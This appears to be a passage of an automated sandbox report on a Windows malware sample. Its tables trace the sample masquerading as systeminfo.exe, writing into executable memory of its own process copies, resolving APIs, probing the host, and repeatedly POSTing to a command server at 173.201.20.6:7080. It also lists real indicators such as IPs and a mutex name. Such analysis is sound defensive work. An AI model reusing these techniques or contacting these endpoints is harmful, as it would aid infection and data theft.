| Allocate | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" | address = 0x400000, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 114688 |
|
1 | |
| Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" | address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 |
|
1 | |
| Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" | address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 |
|
1 | |
| Get Info | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" | address = 0x400000, protection_out = PAGE_NOACCESS, size_out = 8257536 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" | address = 0x400000, size = 102400 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" | address = 0x7efde008, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" | address = 0x7efdf010, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" | address = 0x400000, size = 372736 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" | address = 0x7efde008, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp" | address = 0x7efdf010, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" | address = 0x400000, size = 114688 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" | address = 0x7efde008, size = 4 |
|
1 | |
| Write | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB2F.tmp" | address = 0x7efdf010, size = 4 |
|
1 |
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | msvcrt.dll | base_address = 0x752a0000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x759f0000 |
|
1 | |
| Load | USER32.dll | base_address = 0x75790000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x756e0000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x756e0000 |
|
4 | |
| Load | crypt32.dll | base_address = 0x758d0000 |
|
3 | |
| Load | shell32.dll | base_address = 0x75c50000 |
|
3 | |
| Load | urlmon.dll | base_address = 0x76c40000 |
|
3 | |
| Load | userenv.dll | base_address = 0x74b90000 |
|
4 | |
| Load | wininet.dll | base_address = 0x75350000 |
|
3 | |
| Load | wtsapi32.dll | base_address = 0x74bb0000 |
|
4 | |
| Load | mpr.dll | base_address = 0x741e0000 |
|
1 | |
| Load | netapi32.dll | base_address = 0x741c0000 |
|
1 | |
| Load | SAMCLI.DLL | base_address = 0x74170000 |
|
1 | |
| Get Filename | - | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 |
|
22 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x36f9bc |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x36f9f4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | - | function = UnmapViewOfFile, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | - | function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | - | function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x36fa64 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = strchr, address_out = 0x752adbeb |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = free, address_out = 0x752a9894 |
|
1 | |
| Get Address | c:\windows\syswow64\msvcrt.dll | function = malloc, address_out = 0x752a9cee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x75aa6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75a01700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x75a2828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75a04435 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x75a05929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x75a23102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75a054ee |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75a04442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75a014b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameA, address_out = 0x75a1b6e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetComputerNameExA, address_out = 0x75a842ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75a05a4b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x75a1eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75a011c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75a014c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75a011a9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x757bae5f |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameA, address_out = 0x7570a4b4 |
|
1 | |
| Create Mapping | C:\ProgramData\FB2F.tmp | filename = C:\ProgramData\FB2F.tmp, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\ProgramData\FB2F.tmp | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
3 | |
| Get Computer Name | result_out = YKyd69q, type = ComputerNameDnsHostname |
|
1 | |
| Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 | |
| Get Time | type = Local Time, time = 2017-11-28 18:18:23 (Local Time) |
|
6 | |
| Get Time | type = Ticks, time = 105066 |
|
1 | |
| Get Time | type = Ticks, time = 105082 |
|
3 | |
| Get Time | type = Ticks, time = 106408 |
|
1 | |
| Get Time | type = Ticks, time = 111415 |
|
1 | |
| Get Time | type = Ticks, time = 112414 |
|
1 | |
| Get Time | type = Ticks, time = 113412 |
|
1 | |
| Get Time | type = Ticks, time = 114411 |
|
1 | |
| Get Time | type = Ticks, time = 115409 |
|
1 | |
| Get Time | type = Ticks, time = 116423 |
|
1 | |
| Get Time | type = Ticks, time = 117421 |
|
1 | |
| Get Time | type = Ticks, time = 118420 |
|
1 | |
| Get Time | type = Ticks, time = 119418 |
|
1 | |
| Get Time | type = Ticks, time = 120417 |
|
1 | |
| Get Time | type = Ticks, time = 121415 |
|
1 | |
| Get Time | type = Ticks, time = 122413 |
|
1 | |
| Get Time | type = Ticks, time = 123412 |
|
1 | |
| Get Time | type = Ticks, time = 124410 |
|
1 | |
| Get Time | type = Ticks, time = 125409 |
|
1 | |
| Get Time | type = Ticks, time = 126423 |
|
1 | |
| Get Time | type = Ticks, time = 127421 |
|
1 | |
| Get Time | type = Ticks, time = 128420 |
|
1 | |
| Get Time | type = Ticks, time = 129434 |
|
1 | |
| Get Time | type = Ticks, time = 129902 |
|
3 | |
| Get Time | type = Ticks, time = 129980 |
|
1 | |
| Get Time | type = Ticks, time = 130416 |
|
1 | |
| Get Time | type = Ticks, time = 130916 |
|
3 | |
| Get Time | type = Ticks, time = 130994 |
|
1 | |
| Get Time | type = Ticks, time = 131415 |
|
1 | |
| Get Time | type = Ticks, time = 131914 |
|
1 | |
| Get Time | type = Ticks, time = 131961 |
|
1 | |
| Get Time | type = Ticks, time = 132117 |
|
1 | |
| Get Time | type = Ticks, time = 132382 |
|
1 | |
| Get Time | type = Ticks, time = 132554 |
|
1 | |
| Get Time | type = Ticks, time = 132569 |
|
1 | |
| Get Time | type = Ticks, time = 132912 |
|
3 | |
| Get Time | type = Ticks, time = 132990 |
|
1 | |
| Get Time | type = Ticks, time = 133412 |
|
1 | |
| Get Time | type = Ticks, time = 133911 |
|
3 | |
| Get Time | type = Ticks, time = 134020 |
|
1 | |
| Get Time | type = Ticks, time = 134129 |
|
1 | |
| Get Time | type = Ticks, time = 134410 |
|
1 | |
| Get Time | type = Ticks, time = 134909 |
|
3 | |
| Get Time | type = Ticks, time = 134987 |
|
1 | |
| Get Time | type = Ticks, time = 135424 |
|
1 | |
| Get Time | type = Ticks, time = 135908 |
|
3 | |
| Get Time | type = Ticks, time = 135986 |
|
1 | |
| Get Time | type = Ticks, time = 136422 |
|
1 | |
| Get Time | type = Ticks, time = 136906 |
|
3 | |
| Get Time | type = Ticks, time = 136984 |
|
1 | |
| Get Time | type = Ticks, time = 137421 |
|
1 | |
| Get Time | type = Ticks, time = 137670 |
|
1 | |
| Get Time | type = Ticks, time = 137904 |
|
3 | |
| Get Time | type = Ticks, time = 137982 |
|
1 | |
| Get Time | type = Ticks, time = 138419 |
|
1 | |
| Get Time | type = Ticks, time = 138903 |
|
3 | |
| Get Time | type = Ticks, time = 138981 |
|
1 | |
| Get Time | type = Ticks, time = 139433 |
|
1 | |
| Get Time | type = Ticks, time = 139917 |
|
3 | |
| Get Time | type = Ticks, time = 140588 |
|
2 | |
| Get Time | type = Ticks, time = 140915 |
|
3 | |
| Get Time | type = Ticks, time = 140993 |
|
1 | |
| Get Time | type = Ticks, time = 141430 |
|
1 | |
| Get Time | type = Ticks, time = 141914 |
|
3 | |
| Get Time | type = Ticks, time = 141992 |
|
1 | |
| Get Time | type = Ticks, time = 142413 |
|
1 | |
| Get Time | type = Ticks, time = 142912 |
|
3 | |
| Get Time | type = Ticks, time = 142990 |
|
1 | |
| Get Time | type = Ticks, time = 143411 |
|
1 | |
| Get Time | type = Ticks, time = 143910 |
|
3 | |
| Get Time | type = Ticks, time = 143988 |
|
1 | |
| Get Time | type = Ticks, time = 144410 |
|
1 | |
| Get Time | type = Ticks, time = 144909 |
|
2 | |
| Get Time | type = Ticks, time = 144987 |
|
1 | |
| Get Time | type = Ticks, time = 145408 |
|
1 | |
| Get Time | type = Ticks, time = 145907 |
|
2 | |
| Get Time | type = Ticks, time = 146422 |
|
1 | |
| Get Time | type = Ticks, time = 146906 |
|
1 | |
| Get Time | type = Ticks, time = 147420 |
|
1 | |
| Get Time | type = Ticks, time = 147904 |
|
1 | |
| Get Time | type = Ticks, time = 148419 |
|
1 | |
| Get Time | type = Ticks, time = 148902 |
|
1 | |
| Get Time | type = Ticks, time = 149417 |
|
1 | |
| Get Info | type = Operating System |
|
3 | |
| Get Info | type = Hardware Information |
|
3 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open | mutex_name = XoBZXxTVpSVrDHIx3tCj, desired_access = MUTEX_MODIFY_STATE, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
6 | |
| Release | - |
|
1 |
| Information | Value |
|---|---|
| Total Data Sent | 6.79 KB (6955 bytes) |
| Total Data Received | 435.79 KB (446252 bytes) |
| Contacted Host Count | 2 |
| Contacted Hosts | 173.201.20.6, 159.203.94.198 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 432.75 KB (443132 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 443124, size_out = 443124 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
